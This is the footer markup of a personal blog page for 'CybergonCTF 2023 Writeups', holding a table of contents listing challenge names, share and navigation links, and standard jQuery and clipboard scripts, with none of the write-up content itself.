  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="../../../../index.html">Home</a></li>
        
          <li><a href="../../../../about/">About</a></li>
        
          <li><a href="../../../../archives/">Writing</a></li>
        
          <li><a target="_blank" rel="noopener" href="http://github.com/nkd3v">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Introduction"><span class="toc-number">1.</span> <span class="toc-text">Introduction</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PWN"><span class="toc-number">2.</span> <span class="toc-text">PWN</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#teeny"><span class="toc-number">2.1.</span> <span class="toc-text">teeny</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#autograph"><span class="toc-number">2.2.</span> <span class="toc-text">autograph</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#really-random"><span class="toc-number">2.3.</span> <span class="toc-text">really random</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Steganography"><span class="toc-number">3.</span> <span class="toc-text">Steganography</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Catch-Me-If-You-Can"><span class="toc-number">3.1.</span> <span class="toc-text">Catch Me If You Can</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Cryptography"><span class="toc-number">4.</span> <span class="toc-text">Cryptography</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#EZ-RSA"><span class="toc-number">4.1.</span> <span class="toc-text">EZ RSA</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Now-You-See-Me-1"><span class="toc-number">4.2.</span> <span class="toc-text">Now You See Me 1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#dO-nOT-aCCESS"><span class="toc-number">4.3.</span> <span class="toc-text">dO nOT aCCESS</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&text=CybergonCTF 2023 Writeups"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&title=CybergonCTF 2023 Writeups"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&is_video=false&description=CybergonCTF 2023 Writeups"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=CybergonCTF 2023 Writeups&body=Check out this article: https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&title=CybergonCTF 2023 Writeups"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&title=CybergonCTF 2023 Writeups"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&title=CybergonCTF 2023 Writeups"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&title=CybergonCTF 2023 Writeups"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&name=CybergonCTF 2023 Writeups&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://nkd3v.github.io/2023/08/21/CybergonCTF-2023-Writeups/&t=CybergonCTF 2023 Writeups"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2023
    Narongpol Kijrangsan
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="../../../../index.html">Home</a></li><!--
     --><!--
       --><li><a href="../../../../about/">About</a></li><!--
     --><!--
       --><li><a href="../../../../archives/">Writing</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/nkd3v">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="../../../../../js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
